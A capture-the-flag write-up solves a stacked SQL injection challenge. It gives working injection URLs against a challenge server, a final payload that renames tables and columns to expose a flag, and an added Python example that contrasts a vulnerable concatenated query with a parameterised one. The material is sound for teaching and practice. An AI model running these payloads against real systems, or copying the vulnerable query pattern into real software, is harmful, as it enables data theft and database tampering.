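Environment: 攻防世界
order by 3 raises an error, so the query returns two columns.
Try union select.
Many keywords are banned, so the only option left is stacked injection.
Dump the databases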
http://220.249.52.134:33346/?inject=-1';show databases;--+
ctftraining
information_schema
mysql
performance_schema
supersqli
test
List the tables in ctftraining
http://220.249.52.134:33346/?inject=-1';use ctftraining;show tables;--+
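Brief database structure
Use the desc keyword to view the structure of each table. The flag turns out to be in the 1919810931114514 table of the supersqli database, while the search box queries the id column of the words table.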
http://220.249.52.134:33346/?inject=-1';use ctftraining;desc `FLAG_TABLE`;--+
Final payload
?inject=1' or 1=1; rename tables words to words1;rename tables `1919810931114514` to words;alter table words change flag id varchar(100);
Payload analysis:
rename table words to words1; // rename the words table to words1
rename table `1919810931114514` to words; // rename the 1919810931114514 table to words
alter table words change flag id varchar(100); // rename the flag column of the words table to id
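Why the keyword filter does not stop this, and what does: the following is an added example, not part of the original write-up or the challenge's code. It uses Python's sqlite3 as a stand-in for the MySQL backend; the blacklist contents, the secret table and the function names are assumptions made for illustration.

```python
import re
import sqlite3

# Assumed blacklist; the write-up does not list which keywords are banned.
BLACKLIST = re.compile(r"select|update|delete|drop|insert|where", re.I)

# Constructed input with the same shape as the write-up's rename payload (SQLite syntax).
PAYLOAD = "1'; ALTER TABLE words RENAME TO words1; ALTER TABLE secret RENAME TO words; --"

def make_db():
    """Constructed schema: the table the search box reads, plus a second table."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE words (id TEXT, data TEXT);"
        "INSERT INTO words VALUES ('1', 'hello');"
        "CREATE TABLE secret (flag TEXT);"
        "INSERT INTO secret VALUES ('constructed-secret');"
    )
    return db

def tables(db):
    """Return the current table names, sorted."""
    rows = db.execute("SELECT name FROM sqlite_master WHERE type = 'table'")
    return sorted(name for (name,) in rows)

def lookup_vulnerable(db, inject):
    """Keyword filter + string concatenation + a multi-statement API."""
    if BLACKLIST.search(inject):
        raise ValueError("blocked by keyword filter")
    # executescript() runs every ';'-separated statement, so text after the
    # closing quote is executed as additional statements.
    db.executescript("SELECT id, data FROM words WHERE id = '" + inject + "';")

def lookup_hardened(db, inject):
    """Bound parameter + execute(), which accepts a single statement only."""
    cur = db.execute("SELECT id, data FROM words WHERE id = ?", (inject,))
    return cur.fetchall()

if __name__ == "__main__":
    db = make_db()
    lookup_vulnerable(db, PAYLOAD)
    print("after vulnerable lookup:", tables(db))
    db = make_db()
    print("hardened result:", lookup_hardened(db, PAYLOAD))
    print("after hardened lookup:", tables(db))
```

The filter passes the input because schema-changing statements contain none of the banned words; the bound parameter treats the whole string as an id value, so the schema is left unchanged.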